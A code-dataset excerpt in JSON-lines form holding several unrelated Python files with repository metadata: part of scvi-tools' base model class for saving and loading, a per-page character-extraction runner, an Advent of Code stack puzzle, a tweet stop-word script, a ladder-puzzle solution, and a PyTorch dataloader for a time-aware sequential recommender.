attributes = inspect.getmembers(self, lambda a: not (inspect.isroutine(a)))\n attributes = [\n a for a in attributes if not (a[0].startswith(\"__\") and a[0].endswith(\"__\"))\n ]\n attributes = [a for a in attributes if not a[0].startswith(\"_abc_\")]\n return attributes\n\n def _get_init_params(self, locals):\n \"\"\"Returns the model init signature with associated passed in values.\n\n Ignores the initial AnnData.\n \"\"\"\n init = self.__init__\n sig = inspect.signature(init)\n parameters = sig.parameters.values()\n\n init_params = [p.name for p in parameters]\n all_params = {p: locals[p] for p in locals if p in init_params}\n all_params = {\n k: v\n for (k, v) in all_params.items()\n if not isinstance(v, AnnData) and not isinstance(v, MuData)\n }\n # not very efficient but is explicit\n # separates variable params (**kwargs) from non variable params into two dicts\n non_var_params = [p.name for p in parameters if p.kind != p.VAR_KEYWORD]\n non_var_params = {k: v for (k, v) in all_params.items() if k in non_var_params}\n var_params = [p.name for p in parameters if p.kind == p.VAR_KEYWORD]\n var_params = {k: v for (k, v) in all_params.items() if k in var_params}\n\n user_params = {\"kwargs\": var_params, \"non_kwargs\": non_var_params}\n\n return user_params\n\n @abstractmethod\n def train(self):\n \"\"\"Trains the model.\"\"\"\n\n def save(\n self,\n dir_path: str,\n prefix: str | None = None,\n overwrite: bool = False,\n save_anndata: bool = False,\n save_kwargs: dict | None = None,\n **anndata_write_kwargs,\n ):\n \"\"\"Save the state of the model.\n\n Neither the trainer optimizer state nor the trainer history are saved.\n Model files are not expected to be reproducibly saved and loaded across versions\n until we reach version 1.0.\n\n Parameters\n ----------\n dir_path\n Path to a directory.\n prefix\n Prefix to prepend to saved file names.\n overwrite\n Overwrite existing data or not. If `False` and directory\n already exists at `dir_path`, error will be raised.\n save_anndata\n If True, also saves the anndata\n save_kwargs\n Keyword arguments passed into :func:`~torch.save`.\n anndata_write_kwargs\n Kwargs for :meth:`~anndata.AnnData.write`\n \"\"\"\n if not os.path.exists(dir_path) or overwrite:\n os.makedirs(dir_path, exist_ok=overwrite)\n else:\n raise ValueError(\n f\"{dir_path} already exists. Please provide another directory for saving.\"\n )\n\n file_name_prefix = prefix or \"\"\n save_kwargs = save_kwargs or {}\n\n if save_anndata:\n file_suffix = \"\"\n if isinstance(self.adata, AnnData):\n file_suffix = \"adata.h5ad\"\n elif isinstance(self.adata, MuData):\n file_suffix = \"mdata.h5mu\"\n self.adata.write(\n os.path.join(dir_path, f\"{file_name_prefix}{file_suffix}\"),\n **anndata_write_kwargs,\n )\n\n model_save_path = os.path.join(dir_path, f\"{file_name_prefix}model.pt\")\n\n # save the model state dict and the trainer state dict only\n model_state_dict = self.module.state_dict()\n\n var_names = self.adata.var_names.astype(str)\n var_names = var_names.to_numpy()\n\n # get all the user attributes\n user_attributes = self._get_user_attributes()\n # only save the public attributes with _ at the very end\n user_attributes = {a[0]: a[1] for a in user_attributes if a[0][-1] == \"_\"}\n\n torch.save(\n {\n \"model_state_dict\": model_state_dict,\n \"var_names\": var_names,\n \"attr_dict\": user_attributes,\n },\n model_save_path,\n **save_kwargs,\n )\n\n @classmethod\n @devices_dsp.dedent\n def load(\n cls,\n dir_path: str,\n adata: AnnOrMuData | None = None,\n accelerator: str = \"auto\",\n device: int | str = \"auto\",\n prefix: str | None = None,\n backup_url: str | None = None,\n ):\n \"\"\"Instantiate a model from the saved output.\n\n Parameters\n ----------\n dir_path\n Path to saved outputs.\n adata\n AnnData organized in the same way as data used to train model.\n It is not necessary to run setup_anndata,\n as AnnData is validated against the saved `scvi` setup dictionary.\n If None, will check for and load anndata saved with the model.\n %(param_accelerator)s\n %(param_device)s\n prefix\n Prefix of saved file names.\n backup_url\n URL to retrieve saved outputs from if not present on disk.\n\n Returns\n -------\n Model with loaded state dictionaries.\n\n Examples\n --------\n >>> model = ModelClass.load(save_path, adata) # use the name of the model class used to save\n >>> model.get_....\n \"\"\"\n load_adata = adata is None\n _, _, device = parse_device_args(\n accelerator=accelerator,\n devices=device,\n return_device=\"torch\",\n validate_single_device=True,\n )\n\n (\n attr_dict,\n var_names,\n model_state_dict,\n new_adata,\n ) = _load_saved_files(\n dir_path,\n load_adata,\n map_location=device,\n prefix=prefix,\n backup_url=backup_url,\n )\n adata = new_adata if new_adata is not None else adata\n\n _validate_var_names(adata, var_names)\n\n registry = attr_dict.pop(\"registry_\")\n if _MODEL_NAME_KEY in registry and registry[_MODEL_NAME_KEY] != cls.__name__:\n raise ValueError(\n \"It appears you are loading a model from a different class.\"\n )\n\n if _SETUP_ARGS_KEY not in registry:\n raise ValueError(\n \"Saved model does not contain original setup inputs. \"\n \"Cannot load the original setup.\"\n )\n\n # Calling ``setup_anndata`` method with the original arguments passed into\n # the saved model. This enables simple backwards compatibility in the case of\n # newly introduced fields or parameters.\n method_name = registry.get(_SETUP_METHOD_NAME, \"setup_anndata\")\n getattr(cls, method_name)(\n adata, source_registry=registry, **registry[_SETUP_ARGS_KEY]\n )\n\n model = _initialize_model(cls, adata, attr_dict)\n model.module.on_load(model)\n model.module.load_state_dict(model_state_dict)\n\n model.to_device(device)\n model.module.eval()\n model._validate_anndata(adata)\n return model\n\n @classmethod\n def convert_legacy_save(\n cls,\n dir_path: str,\n output_dir_path: str,\n overwrite: bool = False,\n prefix: str | None = None,\n **save_kwargs,\n ) -> None:\n \"\"\"Converts a legacy saved model ( None:\n \"\"\"Print args used to setup a saved model.\n\n Parameters\n ----------\n dir_path\n Path to saved outputs.\n prefix\n Prefix of saved file names.\n \"\"\"\n registry = BaseModelClass.load_registry(dir_path, prefix)\n AnnDataManager.view_setup_method_args(registry)\n\n @staticmethod\n def load_registry(dir_path: str, prefix: str | None = None) -> dict:\n \"\"\"Return the full registry saved with the model.\n\n Parameters\n ----------\n dir_path\n Path to saved outputs.\n prefix\n Prefix of saved file names.\n\n Returns\n -------\n The full registry saved with the model\n \"\"\"\n attr_dict = _load_saved_files(dir_path, False, prefix=prefix)[0]\n\n # Legacy support for old setup dict format.\n if \"scvi_setup_dict_\" in attr_dict:\n raise NotImplementedError(\n \"Viewing setup args for pre v0.15.0 models is unsupported. \"\n \"Update your save files with ``convert_legacy_save`` first.\"\n )\n\n return attr_dict.pop(\"registry_\")\n\n def view_anndata_setup(\n self, adata: AnnOrMuData | None = None, hide_state_registries: bool = False\n ) -> None:\n \"\"\"Print summary of the setup for the initial AnnData or a given AnnData object.\n\n Parameters\n ----------\n adata\n AnnData object setup with ``setup_anndata`` or\n :meth:`~scvi.data.AnnDataManager.transfer_fields`.\n hide_state_registries\n If True, prints a shortened summary without details of each state registry.\n \"\"\"\n if adata is None:\n adata = self.adata\n try:\n adata_manager = self.get_anndata_manager(adata, required=True)\n except ValueError as err:\n raise ValueError(\n f\"Given AnnData not setup with {self.__class__.__name__}. \"\n \"Cannot view setup summary.\"\n ) from err\n adata_manager.view_registry(hide_state_registries=hide_state_registries)\n\n\nclass BaseMinifiedModeModelClass(BaseModelClass):\n \"\"\"Abstract base class for scvi-tools models that can handle minified data.\"\"\"\n\n @property\n def minified_data_type(self) -> MinifiedDataType | None:\n \"\"\"The type of minified data associated with this model, if applicable.\"\"\"\n return (\n self.adata_manager.get_from_registry(REGISTRY_KEYS.MINIFY_TYPE_KEY)\n if REGISTRY_KEYS.MINIFY_TYPE_KEY in self.adata_manager.data_registry\n else None\n )\n\n @abstractmethod\n def minify_adata(\n self,\n *args,\n **kwargs,\n ):\n \"\"\"Minifies the model's adata.\n\n Minifies the adata, and registers new anndata fields as required (can be model-specific).\n This also sets the appropriate property on the module to indicate that the adata is minified.\n\n Notes\n -----\n The modification is not done inplace -- instead the model is assigned a new (minified)\n version of the adata.\n \"\"\"\n\n @staticmethod\n @abstractmethod\n def _get_fields_for_adata_minification(minified_data_type: MinifiedDataType):\n \"\"\"Return the anndata fields required for adata minification of the given type.\"\"\"\n\n def _update_adata_and_manager_post_minification(\n self, minified_adata: AnnOrMuData, minified_data_type: MinifiedDataType\n ):\n \"\"\"Update the anndata and manager inplace after creating a minified adata.\"\"\"\n # Register this new adata with the model, creating a new manager in the cache\n self._validate_anndata(minified_adata)\n new_adata_manager = self.get_anndata_manager(minified_adata, required=True)\n # This inplace edits the manager\n new_adata_manager.register_new_fields(\n self._get_fields_for_adata_minification(minified_data_type)\n )\n # We set the adata attribute of the model as this will update self.registry_\n # and self.adata_manager with the new adata manager\n self.adata = minified_adata\n\n @property\n def summary_string(self):\n \"\"\"Summary string of the model.\"\"\"\n summary_string = super().summary_string\n summary_string += \"\\nModel's adata is minified?: {}\".format(\n hasattr(self, \"minified_data_type\") and self.minified_data_type is not None\n )\n return summary_string\n","repo_name":"scverse/scvi-tools","sub_path":"scvi/model/base/_base_model.py","file_name":"_base_model.py","file_ext":"py","file_size_in_byte":34481,"program_lang":"python","lang":"en","doc_type":"code","stars":1037,"dataset":"github-code","pt":"72"} +{"seq_id":"20358782705","text":"from os import listdir, system\nfrom os.path import isfile, join\nimport sys\n\nRAW_PDF_DIR = 'rawPDFs'\nCHARACTER_BOX_DIR = 'CharacterBoxes'\n\nbatch, name, numPages = sys.argv[1:]\nnumPages = int(numPages)\n\n\nfor page in range(1,numPages+1):\n\t# print batch, name, page\n\tcmd = \"python FindCharactersOnPage.py {} {} {} > {}/{}-{}-page-{}-{}.csv\".format(batch, name, page, CHARACTER_BOX_DIR, batch, name, page, CHARACTER_BOX_DIR)\n\tsystem(cmd)\n","repo_name":"todd9527/cs229-project","sub_path":"allPagesFindCharactersOnPage.py","file_name":"allPagesFindCharactersOnPage.py","file_ext":"py","file_size_in_byte":433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27436581592","text":"import re\nimport os \n\n# Read in Data\nf = open(os.path.dirname(os.path.abspath(__file__)) + '/day05.txt', 'r')\ncontent = f.read()\nf.close()\n\n## Split into instructions and create stack\ncontent = [x for x in content.split('\\n\\n')]\n\n## Format Instructions \ninstructions = content[1]\n# instructions example\n# instructions = \"\"\"move 1 from 2 to 1\n# move 3 from 1 to 3\n# move 2 from 2 to 1\n# move 1 from 1 to 2\n# \"\"\"\ninstructions = [x for x in instructions.split('\\n')]\ninstructions = [[int(y) for y in re.findall(r'\\d+', x)] for x in instructions]\n\n## Format Stack\nstack=content[0]\nstack = [\n ['H','R','B','D','Z','F','L','S'],\n ['T','B','M','Z','R'],\n ['Z','L','C','H','N','S'],\n ['S','C','F','J'],\n ['P','G','H','W','R','Z','B'],\n ['V','J','Z','G','D','N','M','T'],\n ['G','L','N','W','F','S','P','Q'],\n ['M','Z','R'],\n ['M','C','L','G','V','R','T']\n]\n\n# stack example\n# stack = [\n# ['z','n'],\n# ['m','c','d'],\n# ['p']\n# ]\n\nfor x in range(len(instructions)):\n if len(instructions[x]) == 0: break\n \n move = instructions[x][0]\n origin = instructions[x][1]-1\n destination = instructions[x][2]-1\n\n # Move from origin to destination reversing order - delete end of list where origin is\n moving = stack[origin][-move:]\n\n # Reverse list if part 1 \n # moving.reverse() \n\n stack[destination] = stack[destination] + moving\n stack[origin] = stack[origin][:-move]\n\n\nprint(''.join([x[-1] for x in stack]))\n","repo_name":"shaunksk/advent-of-code","sub_path":"2022/day05.py","file_name":"day05.py","file_ext":"py","file_size_in_byte":1461,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27487129376","text":"import sqlite3\nfrom jNlp.jTokenize import jTokenize\n\nconn = sqlite3.connect('streaming_data.sqlite')\ncur = conn.cursor() \n\nresult = cur.execute(\"SELECT message FROM tweets WHERE date BETWEEN 'Fri Sep 08 00:00:00 +0000 2017' AND 'Fri Sep 08 00:05:00 +0000 2017'\")\nfhand = open('ja_stopword.txt', encoding =\"utf-8\")\nstop_words=[]\n\nfor messages in result:\n\tfor message in messages:\n\t\tt_message = jTokenize(message)\n\t\tprint('-'.join(t_message))\n\n\n#for words in fhand:\n#\twords = words.strip('\\n')\n#\tif words not in stop_words:\n#\t\tstop_words.append(words)\n\t\n\n#filtered_sentence = [w for w in msg_tokenized if not w in stop_words]\n#print(\"CLEANED:\")\n#print(filtered_sentence)\n","repo_name":"jesseulundo/Twitter_Anlytics","sub_path":"stop_words_tweet_part.py","file_name":"stop_words_tweet_part.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16533088827","text":"import sys\n\nsys.stdin = open('c:\\\\Users\\\\multicampus\\\\Desktop\\\\vscode\\\\algorithm\\\\SWEA_D4\\\\1210\\\\input.txt')\n\n\ndef find(boardi, b):\n a = 100\n while a>0:\n if boardi[a][b+1]:\n while boardi[a][b+1]:\n b += 1\n a -= 1\n elif boardi[a][b-1]:\n while boardi[a][b-1]:\n b -= 1\n a -= 1\n else:\n a -= 1\n return b-1\n\n\nfor tc in range(10):\n tc = int(input())\n board = [ [0 for _ in range(102) ] ]\n for _ in range(100):\n board.append([0]+list(map(int, input().split()))+[0])\n finish = board[-1].index(2)\n result = find(board, int(finish))\n print(f'#{tc} {result}')\n","repo_name":"yuueuni/algorithm","sub_path":"swea/SWEA_D4/1210/1210.py","file_name":"1210.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18191694586","text":"import csv\nimport time\nimport torch\nimport random\nimport numpy as np\n\nfrom tqdm import tqdm\nfrom torch.utils import data\nfrom datetime import datetime\nfrom torch.nn.utils.rnn import pad_sequence\nfrom dateutil.relativedelta import relativedelta\n\n\nrandom.seed(2022)\n\ndef toymd(time):\n return datetime.utcfromtimestamp(time)#.strftime('%Y-%m-%d')\n\ndef get_timebin_from_timestamp(times, timebins): # times: timestamps\n binfeature = np.zeros(len(timebins))\n for eachtime in times: \n binidxs = np.where(timebins <= toymd(eachtime))[0] # select an element\n \n if len(binidxs) != 0: \n target_bin_idx = binidxs[-1] \n binfeature[target_bin_idx] += 1 \n return binfeature\n\ndef get_timebin_from_timestamp4eachuser(times, timebins): # times: timestamps of consumed items \n time_bins = [] # frequency bins that will be used as features\n for eachtime in times: \n binfeature = np.zeros(len(timebins))\n\n binidxs = np.where(timebins <= toymd(eachtime))[0] # select an element\n \n if len(binidxs) != 0: \n target_bin_idx = binidxs[-1] \n binfeature[target_bin_idx] += 1 \n time_bins.append(binfeature)\n return time_bins\n\nclass SEQRS_Dataset(data.Dataset):\n \n def build_consumption_history(self, uirt):\n # Build a dictionary for user: items consumed by the user\n uidict = {}\n allitems = set()\n for u, i, _, _ in uirt.astype(int):\n if u not in uidict: uidict[u] = set()\n uidict[u].add(i)\n allitems.add(i)\n \n ui_cand_dict = {} \n for u in tqdm(uidict):\n allnegitems = list(allitems - uidict[u])\n truncated_negitems = allnegitems[:1000]\n ui_cand_dict[u] = np.array(truncated_negitems)\n# ui_cand_dict[u] = np.array(list(allitems - uidict[u]))\n \n # TODO: Its size increases proportionally \n \n return uidict, allitems, ui_cand_dict\n \n def __init__(self, path, trn_numneg, opt): \n dpath = '/'.join(path.split('/')[:-1])\n if dpath[-1] != '/': dpath += '/'\n dtype = path.split('/')[-1] # dtype {trn, vld, tst}\n \n self.opt = opt\n \n st = time.time() \n \n if dtype == 'trn': \n self.numneg = trn_numneg \n \n self.uirt = np.load(dpath+dtype)\n \n # userhist contains both items and times\n if dtype != 'tst': # trainig or validation\n userhist = np.load(dpath+'userhist', allow_pickle=True).item() \n itemhist = np.load(dpath+'itemhist', allow_pickle=True).item()\n neighborhist = np.load(dpath+'neighborhist', allow_pickle=True).item()\n\n itlist = [[iid, itemhist[iid]] for iid in itemhist]\n \n elif dtype == 'tst':\n userhist = np.load(dpath+'userhist_wvld', allow_pickle=True).item() \n itemhist = np.load(dpath+'itemhist_wvld', allow_pickle=True).item() \n neighborhist = np.load(dpath+'neighborhist_wvld', allow_pickle=True).item() \n \n itlist = [[iid, itemhist[iid]] for iid in itemhist]\n \n # recent item first\n for u in userhist: # + truncation wiht MAX # of users' hist\n itemseq, timeseq = userhist[u]\n reverse_idx = (-timeseq).argsort() \n userhist[u] = [itemseq[reverse_idx][:opt.maxhist], timeseq[reverse_idx][:opt.maxhist]] # NOTE: trauncation from the front is right because the descending sorting \n for i in neighborhist: # + truncation wiht MAX # of users' hist\n userseq, timeseq = neighborhist[i] \n reverse_idx = (-timeseq).argsort()\n neighborhist[i] = [userseq[reverse_idx][:opt.maxhist], timeseq[reverse_idx][:opt.maxhist]] \n for i in itemhist:\n timeseq = itemhist[i]\n reverse_idx = (-timeseq).argsort() \n itemhist[i] = timeseq[reverse_idx][:opt.maxhist] \n # itemhist[i] = timeseq[reverse_idx] # NOTE This version works well..\n\n # 3.1 Building bin basis\n trntimes = np.load(opt.dataset_path + '/trn')[:,-1].astype(int) # ascending sorted\n mintime = toymd(min(trntimes))\n \n timedelta = relativedelta(weeks=opt.binsize)\n\n if dtype == 'trn':\n trnfront_time = trntimes.max() - 60 * 60 * 24 * 7 * opt.period \n trnfront_idx = np.where(trntimes < trnfront_time)[0][-1] \n self.label_period_start_time = trntimes[trnfront_idx]\n trnlabeltime = toymd(self.label_period_start_time)\n \n bins = np.array([mintime + timedelta*i for i in range(1000) # quick implementation\n if mintime + timedelta*i < trnlabeltime] + [trnlabeltime]) \n \n self.bins = bins[-int(opt.bin_ratio * len(bins)):] # Time bin truncation\n elif dtype == 'vld':\n trnmaxtime = toymd(max(trntimes))\n \n bins = np.array([mintime + timedelta*i for i in range(1000) # quick implementation\n if mintime + timedelta*i < trnmaxtime] + [trnmaxtime]) \n \n self.bins = bins[-int(opt.bin_ratio * len(bins)):] \n elif dtype == 'tst':\n vld = [l for l in csv.reader(\n open('/'.join(opt.dataset_path.split('/')[:-1])+'/split/vld.csv'))]\n vldtimes = np.array(vld)[:,-1].astype(int) \n\n\n vldmaxtime = toymd(max(vldtimes)) \n\n bins = np.array([mintime + timedelta*i for i in range(1000) # quick implementation\n if mintime + timedelta*i < vldmaxtime] + [vldmaxtime]) \n self.bins = bins[-int(opt.bin_ratio * len(bins)):]\n\n\n # 3.2 Build time bins for each user's all consumed items \n self.freqbins = {}\n for u in userhist: \n consumed_iids = userhist[u][1]\n fb = get_timebin_from_timestamp4eachuser(consumed_iids, self.bins) \n self.freqbins[u] = np.array(fb) \n\n self.neighbor_user_freqbins = {}\n for i in neighborhist: \n self.neighbor_user_freqbins[i] = {} \n consumed_users, consumed_times = neighborhist[i]\n fb = get_timebin_from_timestamp4eachuser(consumed_times, self.bins) \n \n self.neighbor_user_freqbins[i]['user'] = consumed_users\n self.neighbor_user_freqbins[i]['time'] = consumed_times\n self.neighbor_user_freqbins[i]['freqbin'] = np.array(fb)\n \n\n # Data building for training/validation/test \n if dtype == 'trn': \n trndata = [[u, userhist[u]] for u in userhist] \n \n \n # #.Time bin processing for items\n trntimes = np.concatenate([i[1] for i in itlist]).astype(int)\n \n mintime = toymd(min(trntimes))\n trnmaxtime = toymd(max(trntimes))\n\n trnfront_time = trntimes.max() - 60 * 60 * 24 * 7 * opt.period \n trnfront_idx = np.where(trntimes < trnfront_time)[0][-1] \n label_period_st = trntimes[trnfront_idx] # st: start time\n \n\n self.item_fldict = {} # dictionary of (Item ID - feature, label)\n # item_feature, item_label = [], [] \n for iid in itemhist:\n item_time = itemhist[iid]\n\n feature = item_time[item_time= label_period_st)))\n\n binfeature = get_timebin_from_timestamp(feature, self.bins)\n\n self.item_fldict[iid] = [binfeature, label]\n\n\n self.first, self.second = zip(*trndata) # user and their sequential items with times\n self.third = np.zeros(len(self.first)) # Negative items. 'train_collate' does the job. \n \n # # Global maximum sacrifies some computation\n maxnum_neighbor = max([len(self.neighbor_user_freqbins[i]['user']) for i in self.neighbor_user_freqbins])\n maxnum_neighbor_time = max([len(self.neighbor_user_freqbins[i]['time']) for i in self.neighbor_user_freqbins])\n maxnum_neighbor_freqbin = max([len(self.neighbor_user_freqbins[i]['freqbin']) for i in self.neighbor_user_freqbins])\n\n self.fourth = []\n for i in range(len(self.first)):\n u = self.first[i]\n all_neighbors = []\n all_neighbors_time = []\n all_neighbors_freqbin =[]\n\n for j in self.second[i][0]:\n neighbors = torch.LongTensor(self.neighbor_user_freqbins[j]['user'])\n neighbors_time = torch.LongTensor(self.neighbor_user_freqbins[j]['time'])\n neighbors_freqbin = torch.LongTensor(self.neighbor_user_freqbins[j]['freqbin'])\n\n all_neighbors.append(neighbors)\n all_neighbors_time.append(neighbors_time)\n all_neighbors_freqbin.append(neighbors_freqbin)\n \n\n # First make sure padding to the maximum length\n all_neighbors[0] = torch.cat([all_neighbors[0], torch.zeros(maxnum_neighbor-len(all_neighbors[0]))])\n all_neighbors_time[0] = torch.cat([all_neighbors_time[0], torch.zeros(maxnum_neighbor_time-len(all_neighbors_time[0]))])\n all_neighbors_freqbin[0] = torch.cat([all_neighbors_freqbin[0], torch.zeros(maxnum_neighbor_freqbin-all_neighbors_freqbin[0].shape[0],all_neighbors_freqbin[0].shape[1])])\n\n all_neighbors = pad_sequence(all_neighbors, batch_first=True)\n all_neighbors_time = pad_sequence(all_neighbors_time, batch_first=True)\n all_neighbors_freqbin = pad_sequence(all_neighbors_freqbin, batch_first=True)\n\n self.fourth.append({'user':all_neighbors, 'time':all_neighbors_time, 'freqbin':all_neighbors_freqbin})\n \n self.numuser = len(set(self.uirt[:,0]))\n self.numitem = len(set(self.uirt[:,1]))\n \n\n elif dtype in ['vld', 'tst']: # Evaluation\n # Find user histories \n \n # Build validation data for ranking evaluation\n newuir = []\n for row in self.uirt: \n user = row[0]\n uhist = userhist[user] \n items = row[1:] # 1 positive item + 100 negative items\n newuir.append([[user, uhist], items])\n \n self.first, self.second = zip(*newuir)\n self.third = np.zeros(len(self.first)) # this is dummy data\n self.fourth = np.zeros(len(self.first)) # this is dummy data\n\n # # Global maximum sacrifies some computation\n maxnum_neighbor = max([len(self.neighbor_user_freqbins[i]['user']) for i in self.neighbor_user_freqbins])\n maxnum_neighbor_time = max([len(self.neighbor_user_freqbins[i]['time']) for i in self.neighbor_user_freqbins])\n maxnum_neighbor_freqbin = max([len(self.neighbor_user_freqbins[i]['freqbin']) for i in self.neighbor_user_freqbins])\n\n users = [i[0] for i in self.first]\n items = [row[1:] for row in self.uirt]\n self.fourth = []\n for i in range(len(users)):\n u = users[i]\n all_neighbors = []\n all_neighbors_time = []\n all_neighbors_freqbin =[]\n\n for j in items[i]:\n neighbors = torch.LongTensor(self.neighbor_user_freqbins[j]['user'])\n neighbors_time = torch.LongTensor(self.neighbor_user_freqbins[j]['time'])\n neighbors_freqbin = torch.LongTensor(self.neighbor_user_freqbins[j]['freqbin'])\n\n all_neighbors.append(neighbors)\n all_neighbors_time.append(neighbors_time)\n all_neighbors_freqbin.append(neighbors_freqbin)\n\n # Pdding here \n\n # First make sure padding to the maximum length\n all_neighbors[0] = torch.cat([all_neighbors[0], torch.zeros(maxnum_neighbor-len(all_neighbors[0]))])\n all_neighbors_time[0] = torch.cat([all_neighbors_time[0], torch.zeros(maxnum_neighbor_time-len(all_neighbors_time[0]))])\n all_neighbors_freqbin[0] = torch.cat([all_neighbors_freqbin[0], torch.zeros(maxnum_neighbor_freqbin-all_neighbors_freqbin[0].shape[0],all_neighbors_freqbin[0].shape[1])])\n\n all_neighbors = pad_sequence(all_neighbors, batch_first=True)\n all_neighbors_time = pad_sequence(all_neighbors_time, batch_first=True)\n all_neighbors_freqbin = pad_sequence(all_neighbors_freqbin, batch_first=True)\n\n self.fourth.append({'user':all_neighbors, 'time':all_neighbors_time, 'freqbin':all_neighbors_freqbin})\n\n\n self.item_fdict = {} # dictionary of (Item ID - feature) \n for iid in itemhist: \n item_time = itemhist[iid] \n feature = item_time\n \n # make time stamps to timebins\n binfeature = get_timebin_from_timestamp(feature, self.bins)\n \n self.item_fdict[iid] = binfeature\n\n \n \n print('{} data : {:.2}s'.format(dtype.upper(), time.time()-st))\n\n def __getitem__(self, index):\n # Training: [user, positive, negative]\n # Testing: [user, canidate item, label] \n return self.first[index], self.second[index], self.third[index], self.fourth[index]\n \n def __len__(self):\n \"\"\"Returns the total number of user-item pairs.\"\"\"\n return len(self.first)\n \n \n def train_collate(self, batch):\n # Input: [user, postive item, dummy]\n # Output: [user, positive item, negative item]\n batch = [i for i in filter(lambda x:x is not None, batch)]\n \n uids, items_times, _, neighbor_info = zip(*batch) # users and their history \n iids, raw_times = zip(*items_times) \n\n flatten_user = np.concatenate([[uids[i]]*len(iids[i]) for i in range(len(uids))])\n flatten_item = np.concatenate(iids) \n flatten_time = np.concatenate(raw_times)\n\n flatten_history = [[iids]*len(iids[i]) for i in range(len(iids))]\n\n # User's consumption history (items) to compute virtual features\n num_items = torch.LongTensor([len(i) for i in iids]) \n pad_items = pad_sequence([torch.LongTensor(it) for it in iids], batch_first=True)\n pad_items = torch.repeat_interleave(pad_items, num_items, dim=0)\n\n # Making data into tensor\n users = torch.LongTensor(flatten_user)\n items = torch.LongTensor(flatten_item)\n times = torch.LongTensor(flatten_time)\n\n \n pack_times = pad_sequence([torch.FloatTensor(ti) for ti in raw_times], batch_first=True)\n\n # NOTE: randomly-selecting negative samples shows almost similar performance to using items not consumed by users, while the random-sampling drastically reduces the computation time\n all_neg_items = np.random.randint(self.opt.numitem, size=(self.opt.numneg, len(users)))\n all_neg_items = torch.LongTensor(all_neg_items)\n\n # Flatten item (extrinsic data) \n flatten_items = items # Not matrix format but redundant data\n\n # Find feature & label for extrinsic prediction\n item_freqbins, item_labels = [], []\n for iid in flatten_items.tolist():\n ft, lb = self.item_fldict[iid]\n item_freqbins.append(ft)\n item_labels.append(lb)\n \n item_freqbins = pad_sequence([torch.LongTensor(itf) for itf in item_freqbins], batch_first=True)\n item_labels = torch.LongTensor(item_labels) \n \n # Intrinsic frequncy bins\n freqbins = [self.freqbins[u] for u in uids] \n pad_freqbins = pad_sequence([torch.FloatTensor(fb) for fb in freqbins], batch_first=True) \n pad_freqbins = torch.repeat_interleave(pad_freqbins, num_items, dim=0)\n\n pad_pack_times = torch.repeat_interleave(pack_times, num_items, dim=0)\n\n # data for neighborhodd (Extrinsic prediction)\n\n pad_neighbors = torch.cat([neighbor_info[i]['user'] for i in range(len(neighbor_info))], dim=0).long()\n pad_neighbors_time = torch.cat([neighbor_info[i]['time'] for i in range(len(neighbor_info))], dim=0)\n pad_neighbors_freqbin = torch.cat([neighbor_info[i]['freqbin'] for i in range(len(neighbor_info))], dim=0)\n\n return users, items, times, pad_freqbins, pad_items, pad_pack_times, all_neg_items, item_freqbins, item_labels, pad_neighbors, pad_neighbors_time, pad_neighbors_freqbin\n\n\n def test_collate(self, batch):\n batch = [i for i in filter(lambda x:x is not None, batch)]\n\n uinfo, cand_items, labels, neighbor_info = zip(*batch) \n \n uid, items_times = zip(*uinfo)\n items, times = zip(*items_times)\n\n users = torch.LongTensor(uid)\n labels = torch.LongTensor(labels)\n cand_items = torch.LongTensor(np.array(cand_items)) \n items = pad_sequence([torch.LongTensor(it) for it in items], batch_first=True)\n times = pad_sequence([torch.LongTensor(ti.astype(int)) for ti in times], batch_first=True)\n \n flat_canditems = cand_items.flatten().tolist()\n\n item_freqbins = torch.FloatTensor(np.array([self.item_fdict[i] for i in flat_canditems])) \n\n # Frequncy bins \n freqbins = [self.freqbins[u] for u in uid]\n maxfb = max([fb.shape[0] for fb in freqbins]) \n \n # Padding frequency bins\n numbins = len(self.bins)\n pad_freqbins = []\n for fb in freqbins:\n zeropad = np.zeros((maxfb - fb.shape[0], numbins))\n fb = np.concatenate([fb, zeropad])\n pad_freqbins.append(fb)\n pad_freqbins = np.array(pad_freqbins)\n pad_freqbins = torch.FloatTensor(pad_freqbins)\n \n all_user_info = [users, items, times, pad_freqbins] \n \n pad_neighbors = torch.cat([neighbor_info[i]['user'] for i in range(len(neighbor_info))], dim=0).long()\n pad_neighbors_time = torch.cat([neighbor_info[i]['time'] for i in range(len(neighbor_info))], dim=0)\n pad_neighbors_freqbin = torch.cat([neighbor_info[i]['freqbin'] for i in range(len(neighbor_info))], dim=0)\n\n return all_user_info, cand_items, labels, item_freqbins, pad_neighbors, pad_neighbors_time, pad_neighbors_freqbin\n\n \n\nclass DataLoader: \n def __init__(self, opt):\n self.opt = opt\n self.dpath = opt.dataset_path + '/'\n self.bs = opt.batch_size\n self.trn_numneg = opt.numneg\n \n self.trn_loader, self.vld_loader, self.tst_loader = self.get_loaders_for_seqrs() \n \n print((\"train/val/test/ divided by batch size {:d}/{:d}/{:d}\".format(\n len(self.trn_loader), len(self.vld_loader),len(self.tst_loader))))\n print(\"=\" * 80)\n \n def get_loaders_for_seqrs(self):\n print(\"\\n📋 Loading data...\\n\")\n trn_loader = self.get_each_loader(self.dpath+'trn', self.bs, self.trn_numneg, shuffle=True)\n vld_loader = self.get_each_loader(self.dpath+'vld', int(self.bs/2), self.trn_numneg, shuffle=False)\n tst_loader = self.get_each_loader(self.dpath+'tst', int(self.bs/2), self.trn_numneg, shuffle=False) \n \n return trn_loader, vld_loader, tst_loader\n \n def get_each_loader(self, data_path, batch_size, trn_negnum, shuffle=True, num_workers=0):\n \"\"\"Builds and returns Dataloader.\"\"\"\n\n dataset = SEQRS_Dataset(data_path, trn_negnum, self.opt)\n\n if data_path.endswith('trn'):\n collate = dataset.train_collate\n else:\n collate = dataset.test_collate\n\n data_loader = data.DataLoader(dataset=dataset,\n batch_size=batch_size,\n shuffle=shuffle,\n num_workers=num_workers,\n collate_fn=collate)\n\n return data_loader\n \n def get_loaders(self):\n return self.trn_loader, self.vld_loader, self.tst_loader\n \n def get_embedding(self):\n return self.input_embedding\n \n\n 